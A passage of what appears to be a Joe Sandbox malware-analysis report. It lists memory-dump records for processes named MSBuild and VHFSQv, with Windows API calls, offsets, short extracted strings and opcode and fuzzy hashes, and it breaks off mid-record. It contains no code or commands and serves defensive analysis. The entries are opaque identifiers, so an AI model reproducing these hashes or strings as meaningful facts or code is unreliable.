                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 067530D7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: ffb8f2cc80a80fe16b3ed8fd0806b076962bb57e654e8050fbcc786f7035b7fc
                                                                                      • Instruction ID: e796560c07fa97ef18dde28eea02622ded25f63d693bcee785591fb461859fde
                                                                                      • Opcode Fuzzy Hash: ffb8f2cc80a80fe16b3ed8fd0806b076962bb57e654e8050fbcc786f7035b7fc
                                                                                      • Instruction Fuzzy Hash: ED21B5B5D002489FDB10CF9AD584ADEBBF5FB48310F14845AE918A3350D379A944CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 015872C0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2750557408.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_1580000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID: DeleteFile
                                                                                      • String ID:
                                                                                      • API String ID: 4033686569-0
                                                                                      • Opcode ID: 79557b1378ffc64bdf56f754cbc8b89d4e5e336457a49fdb5a6f45be54f6be76
                                                                                      • Instruction ID: 0059f4c34490c358e5d30c752175c28824ffe4397ac0580f4d6e45d47b19d756
                                                                                      • Opcode Fuzzy Hash: 79557b1378ffc64bdf56f754cbc8b89d4e5e336457a49fdb5a6f45be54f6be76
                                                                                      • Instruction Fuzzy Hash: AE2158B2C0065A8BCB10DF9AD5447AEFBF4FF48320F15856AD919B7241D338A944CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0675B4F9,00000800,00000000,00000000), ref: 0675B6EA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: c79a8c2a7619dc603348d626fde9bffaf4c152f7a247210550d0c43a2ce91bd8
                                                                                      • Instruction ID: 74924710be1c0c46949b24725f841f05d441028935d140c616679917cfe1ef72
                                                                                      • Opcode Fuzzy Hash: c79a8c2a7619dc603348d626fde9bffaf4c152f7a247210550d0c43a2ce91bd8
                                                                                      • Instruction Fuzzy Hash: 761103B6C003088FCB20CF9AD844AAEFBF8EB48710F10846AD819A7210C379A545CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 015872C0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2750557408.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_1580000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID: DeleteFile
                                                                                      • String ID:
                                                                                      • API String ID: 4033686569-0
                                                                                      • Opcode ID: 565b1c96da30d4bb25b483e743011f016e2524bb44de1dcf7fef136243f8ed7c
                                                                                      • Instruction ID: 2369e318a00f90f5ceb205f6befb3f06b8079b8b3d6ef9277b8abcb0bed0145b
                                                                                      • Opcode Fuzzy Hash: 565b1c96da30d4bb25b483e743011f016e2524bb44de1dcf7fef136243f8ed7c
                                                                                      • Instruction Fuzzy Hash: 901147B1C0065A9BCB14DF9AD544BAEFBF4FF48320F10812AE818B7240D738A940CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 0678E6EF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2899243517.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_6780000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID: GlobalMemoryStatus
                                                                                      • String ID:
                                                                                      • API String ID: 1890195054-0
                                                                                      • Opcode ID: 3945ae11013e427c65d1e295506f7bcf234c51a242e0d5d34fb2c0686517b428
                                                                                      • Instruction ID: 15e433ad6d8309e694eed5b8a5714e3ef3ef25daf45117873ca4aee200c2f9ab
                                                                                      • Opcode Fuzzy Hash: 3945ae11013e427c65d1e295506f7bcf234c51a242e0d5d34fb2c0686517b428
                                                                                      • Instruction Fuzzy Hash: 181103B1C006A99FCB10DF9AD5446EEFBB4BF48314F15816AD818A7240D378A944CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 0678E6EF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2899243517.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_6780000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID: GlobalMemoryStatus
                                                                                      • String ID:
                                                                                      • API String ID: 1890195054-0
                                                                                      • Opcode ID: cb99454bf45822777e05dfeac9145ce42429c993a4a736af9237ac51ad583034
                                                                                      • Instruction ID: 621b1d74b7d73cadebfbc5354acd621470748e9ccc69256a4b60d201de3ac698
                                                                                      • Opcode Fuzzy Hash: cb99454bf45822777e05dfeac9145ce42429c993a4a736af9237ac51ad583034
                                                                                      • Instruction Fuzzy Hash: 7A1103B1C006599FCB10DF9AC4446AEFBF4FF48314F15816AE918A7241E378A940CFE5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0675B4F9,00000800,00000000,00000000), ref: 0675B6EA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: 24ea14cf6f4ed7595aa377d51bd47ed35755249299b6e3254bca1a1365dc9e9a
                                                                                      • Instruction ID: fc4daa120f9893dafe7a69a05f4b1ff88472791e5854d40ecb4a267b1ece277a
                                                                                      • Opcode Fuzzy Hash: 24ea14cf6f4ed7595aa377d51bd47ed35755249299b6e3254bca1a1365dc9e9a
                                                                                      • Instruction Fuzzy Hash: FC1117B5C003088FDB10CF9AD444AAEFBF4FB48710F11856AE919A7210D379A545CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0675B47E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      • Opcode ID: fb40039baf7a65a9059fd8cfe50d47bbcec29d69c8e38d5c51ca4333507f1ed3
                                                                                      • Instruction ID: 53b0bfb19c9d550d64fd1954d05cbbe48c4fe5e160eceae8f979649affa89e9e
                                                                                      • Opcode Fuzzy Hash: fb40039baf7a65a9059fd8cfe50d47bbcec29d69c8e38d5c51ca4333507f1ed3
                                                                                      • Instruction Fuzzy Hash: E711E0B5C003498FDB20DF9AD444AEEFBF4EF88714F11856AD819A7210C379A545CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2711614436.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_130d000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6ed562db559d426ca8140c94c23fe8ed38f40890dca08947b1f720bff150333d
                                                                                      • Instruction ID: 5e38033ef527284a8135a095cd6c696d146e647efc94f8aeb8c270cdd7210d17
                                                                                      • Opcode Fuzzy Hash: 6ed562db559d426ca8140c94c23fe8ed38f40890dca08947b1f720bff150333d
                                                                                      • Instruction Fuzzy Hash: 262122B1604204DFDB16DF98D990B26BFE9FB84318F20C56DE90D0B296C33AD406CA62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2711614436.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_130d000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                      • Instruction ID: 2b25af1e68eb6daf082d07e5fdba6b5d251dbe9dd4093e609e69a5484e2da77d
                                                                                      • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                      • Instruction Fuzzy Hash: 5611BE75504280CFDB16CF94D9D4B15BFA1FB84318F24C6AAD8494B697C33AD44ACB62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2899243517.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_6780000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                      • API String ID: 0-2843079600
                                                                                      • Opcode ID: 53f24d0f28667ddc07af61e2699fc4cf4e4c7d738d0a96adedde8bae7a4febbb
                                                                                      • Instruction ID: 17455a5edb92e3dfad5f01b6389bd22c0d47af5ea959cd1ee386d6d6080509ae
                                                                                      • Opcode Fuzzy Hash: 53f24d0f28667ddc07af61e2699fc4cf4e4c7d738d0a96adedde8bae7a4febbb
                                                                                      • Instruction Fuzzy Hash: 69125030B40219CFDBA4EF65C894A6EB7F2BF85314F208569D50AAB354DB34DD85CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2899243517.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_6780000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                      • API String ID: 0-981061697
                                                                                      • Opcode ID: 1de936262c9de1cc354aeb3f3cf896889a628a19440f772e1894cf5553a72398
                                                                                      • Instruction ID: c254644b627a9e4be9661e503473bc64c788bbbe7bc1498e626c9a032ddb5ce5
                                                                                      • Opcode Fuzzy Hash: 1de936262c9de1cc354aeb3f3cf896889a628a19440f772e1894cf5553a72398
                                                                                      • Instruction Fuzzy Hash: 7B026F30B40209CFDB99EFA5D45466EB7B6FF84304F248529D406AB398DB79DC86CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2899243517.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_6780000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                                      • API String ID: 0-3723351465
                                                                                      • Opcode ID: bea5f9314bc3403a3fdf7251ac32046770d37e0420ad5ce8645ef84948403f8c
                                                                                      • Instruction ID: c9b34f9028ee8a40bbffd65a0aef914848afc5c13e4322884fa2b861a4f16b78
                                                                                      • Opcode Fuzzy Hash: bea5f9314bc3403a3fdf7251ac32046770d37e0420ad5ce8645ef84948403f8c
                                                                                      • Instruction Fuzzy Hash: E7024031E1061A8FCB55EF75C89459DB7B2FFC9304F60866AD409AB264EF30AD86CB40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2750557408.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_1580000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: \Vl
                                                                                      • API String ID: 0-682378881
                                                                                      • Opcode ID: ff9d4c6a3c83f7b3fb1046ba0b5398cec768b7376b5c43e1186cb7f0fad6a985
                                                                                      • Instruction ID: de41274ee1cc2442e8eb8d9998361d1587d5c5adf53b8790a265a1b491f11811
                                                                                      • Opcode Fuzzy Hash: ff9d4c6a3c83f7b3fb1046ba0b5398cec768b7376b5c43e1186cb7f0fad6a985
                                                                                      • Instruction Fuzzy Hash: 06B12C70E0020A8FDF14DFADC9857ADBBF2BF88314F148529D815BB294EB749885CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2899243517.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_6780000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4061f82401a7917c25d59b900d0f16e9a369a810196b7ceb56537974f1f2d3d1
                                                                                      • Instruction ID: 9ef647ff226cbc7a15971236221613fc58d87ed0bd88dc51ec4387682bd089e4
                                                                                      • Opcode Fuzzy Hash: 4061f82401a7917c25d59b900d0f16e9a369a810196b7ceb56537974f1f2d3d1
                                                                                      • Instruction Fuzzy Hash: 5BD1D330F401058FDF55EB68C484BBEB7A2EB84300F248969D40AEB395DB75DC86C7A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7b01e32fd94b55532d41bf594557b87363a898b07b3f84aa7d7ba093fd42685a
                                                                                      • Instruction ID: 1b7bb305dc71e1c5616337f7ecf6b57bbf2d004f5c01aaa702305cf2c61b9687
                                                                                      • Opcode Fuzzy Hash: 7b01e32fd94b55532d41bf594557b87363a898b07b3f84aa7d7ba093fd42685a
                                                                                      • Instruction Fuzzy Hash: 16127BB14017469AE334CF65E98C1897BB1BBC1338BD0C309D2612A6EDDBB8158BCF85
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a99c6b5924090a2538059c43f54fdf005ce0b32b770d14504d00ce33ffe21efd
                                                                                      • Instruction ID: 77fe758a705b3b5b58a84da6458fd340416a23e533bcfa31bd75d16cc0dd1fe8
                                                                                      • Opcode Fuzzy Hash: a99c6b5924090a2538059c43f54fdf005ce0b32b770d14504d00ce33ffe21efd
                                                                                      • Instruction Fuzzy Hash: 98A16432E10219CFCF45DFB5C8445AEB7B2FF84300B1686BAE915AB215EB75D945CB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7189a1362ca508075aae3499d6b1c8d0fdf67fa956d628c42aa6f6b05d58c502
                                                                                      • Instruction ID: 3a3fafd275d42bf9ca4e3b3b6e652fc4c38a5533dce79ac5a4b9b038d68a8d50
                                                                                      • Opcode Fuzzy Hash: 7189a1362ca508075aae3499d6b1c8d0fdf67fa956d628c42aa6f6b05d58c502
                                                                                      • Instruction Fuzzy Hash: 1AC1F2B1811746DAD724CF65E8881897BB1BBC5338FA1C309D2616B2EDDBB4158BCF84
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2660353795.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_1730000_VHFSQv.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "$LR]q$LR]q$LR]q$$]q$$]q
                                                                                      • API String ID: 0-1755660813
                                                                                      • Opcode ID: 901d7ae8431bf67cd7e70788cd252e1fe5a87736a7791a4c0cd0bccd9ddc4e4c
                                                                                      • Instruction ID: 2d488dd76a04cb00b997b17e194b2ca7801a74f5436119d706ba08845ef9a8fb
                                                                                      • Opcode Fuzzy Hash: 901d7ae8431bf67cd7e70788cd252e1fe5a87736a7791a4c0cd0bccd9ddc4e4c
                                                                                      • Instruction Fuzzy Hash: 8A029E74B001068FCB15CFA9C894AAEB7F6FFC8300F148569D4169B2A6DB74ED46CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2660353795.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_1730000_VHFSQv.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2b1dc192653a1eee44c8b379de7f9e732b31d042f4e3f340a0ea1672c214ef1e
                                                                                      • Instruction ID: aba8c42c3c6a7b5e08186b07a761e070395039d5491fdb9549048f18eb67a2c9
                                                                                      • Opcode Fuzzy Hash: 2b1dc192653a1eee44c8b379de7f9e732b31d042f4e3f340a0ea1672c214ef1e
                                                                                      • Instruction Fuzzy Hash: 4003BE34A0030ADFDB26DF69CD54B99B7BAFF89700F118596E4086B2A5CB716EC1CB41
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2660353795.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_1730000_VHFSQv.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $]q
                                                                                      • API String ID: 0-1007455737
                                                                                      • Opcode ID: 5d76b97ced9996676864ae357de2ee086a63a4379d841909b8fc5aa586b238d2
                                                                                      • Instruction ID: 898914c3560f2fc44352ebf08864be32a7aa91bd28993280f2ac82fd040f0b47
                                                                                      • Opcode Fuzzy Hash: 5d76b97ced9996676864ae357de2ee086a63a4379d841909b8fc5aa586b238d2
                                                                                      • Instruction Fuzzy Hash: 51F18E34A00206DFDB28CF69C984B6EB7F2BF88705F148529D5069B292DB35EC82CF51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2660353795.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_1730000_VHFSQv.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (aq$Haq
                                                                                      • API String ID: 0-3785302501
                                                                                      • Opcode ID: 567533a77053274bbaf04544894ea9918b209041fc4ec10869eab0934cd71b09
                                                                                      • Instruction ID: e4da54a62c3fddd4e95f518f4a2fb12e7384078945fed3f48ec17857911e61d8
                                                                                      • Opcode Fuzzy Hash: 567533a77053274bbaf04544894ea9918b209041fc4ec10869eab0934cd71b09
                                                                                      • Instruction Fuzzy Hash: C451AA71E002199FCB09DFAA98146EEBBF2EFD5210F1484AAD409E7255EB344A16CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2660353795.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_1730000_VHFSQv.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: `Q]q
                                                                                      • API String ID: 0-1594560043
                                                                                      • Opcode ID: e637ad540fd4f901a00dbff49719226161c38915a63319e277df4e7e9e744720
                                                                                      • Instruction ID: b22a1d373401024fcf06a9f43c07e6516fa83d96235aaf1067dc8a23fe24a3e1
                                                                                      • Opcode Fuzzy Hash: e637ad540fd4f901a00dbff49719226161c38915a63319e277df4e7e9e744720
                                                                                      • Instruction Fuzzy Hash: FA21F074A002468FDB08DFBAC854BADBBF1BF8A300F08006AC442FB295DB359D05CB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2660353795.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_1730000_VHFSQv.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tP]q
                                                                                      • API String ID: 0-2175968468
                                                                                      • Opcode ID: e97fec727467dd6ffbb49e7c39e6b7054656b617fd65904ce093ff8228418718
                                                                                      • Instruction ID: a0e4cee15632c8a5be6bd0249d79aef15f8147d974d189c780e83942b116bd21
                                                                                      • Opcode Fuzzy Hash: e97fec727467dd6ffbb49e7c39e6b7054656b617fd65904ce093ff8228418718
                                                                                      • Instruction Fuzzy Hash: EA4111B1B01241CFCB09DF78C8589ADFFB1BF85715B4940A9C4099F262EB35D802CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2660353795.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_1730000_VHFSQv.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4']q
                                                                                      • API String ID: 0-1259897404
                                                                                      • Opcode ID: f18d512f0a762e7cfc774e9e6e5d2e9aece703011ee147c4b09f19173d1373fb
                                                                                      • Instruction ID: 66b1a07531babd3b309ff78e6219149f07a4dd7bddbfeccd0c7f27f8dc4a403a
                                                                                      • Opcode Fuzzy Hash: f18d512f0a762e7cfc774e9e6e5d2e9aece703011ee147c4b09f19173d1373fb
                                                                                      • Instruction Fuzzy Hash: 6C415170A002099FCB04DFB9E954BADBBF6FF84304F108569E105AB365DB749D4ACB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2660353795.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_1730000_VHFSQv.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $]q
                                                                                      • API String ID: 0-1007455737
                                                                                      • Opcode ID: 94922147b6441236f5033c98aaa4502d662ce0dc37d92554a2a118b05190b389
                                                                                      • Instruction ID: b0475e2777295ac8bc12fc033017640caf858055c8656382f6ea8111744b7893
                                                                                      • Opcode Fuzzy Hash: 94922147b6441236f5033c98aaa4502d662ce0dc37d92554a2a118b05190b389
                                                                                      • Instruction Fuzzy Hash: 83419139A00109DFCB18DF69DC588AABBF6FF8931071182A9E816DB365EB309D45CF51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2660353795.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_1730000_VHFSQv.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4']q
                                                                                      • API String ID: 0-1259897404
                                                                                      • Opcode ID: 142d95d2d82f734b95631c193880370fd02c9834be41dc9d937e1ccd525b5a0c
                                                                                      • Instruction ID: 23c080509b3807688d39629d2137f97c3245cf3d387b84ea2d9915085ec1a2b1
                                                                                      • Opcode Fuzzy Hash: 142d95d2d82f734b95631c193880370fd02c9834be41dc9d937e1ccd525b5a0c
                                                                                      • Instruction Fuzzy Hash: 1D319E70A40209DFCB08DFB9E584A9DBBB6FF84304F108129E1056F36ADB759C8ACB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2660353795.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_1730000_VHFSQv.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tP]q
                                                                                      • API String ID: 0-2175968468
                                                                                      • Opcode ID: 5c0f5d25be1c9fa7b73ae4cbe541fc00d60be139389ca77f6ebfe12315e37dcc
                                                                                      • Instruction ID: 64e0c9f0052710f9db86842df36c5fdc8a08c47bbd5da6305917e8a093324509
                                                                                      • Opcode Fuzzy Hash: 5c0f5d25be1c9fa7b73ae4cbe541fc00d60be139389ca77f6ebfe12315e37dcc
                                                                                      • Instruction Fuzzy Hash: 3C215770B001168FCB58EF79D49886DBBB2AF48704B2044A9D80ADB3B1DB35DC02CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2660353795.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_1730000_VHFSQv.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: `Q]q
                                                                                      • API String ID: 0-1594560043
                                                                                      • Opcode ID: 7f7f5e9378653ee1a8585d61f4a64cccd6e19922f0e5e8092c40fce3148c7b99
                                                                                      • Instruction ID: b1207e7ec46c5da613e84294175fc2b6a6959d90b92594ef1116395b036ed698
                                                                                      • Opcode Fuzzy Hash: 7f7f5e9378653ee1a8585d61f4a64cccd6e19922f0e5e8092c40fce3148c7b99
                                                                                      • Instruction Fuzzy Hash: 0211B974A001064BDB18DFBAC9547AEBBF2BFC9300F144029D542BB395DF359D018BA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2660353795.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_1730000_VHFSQv.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
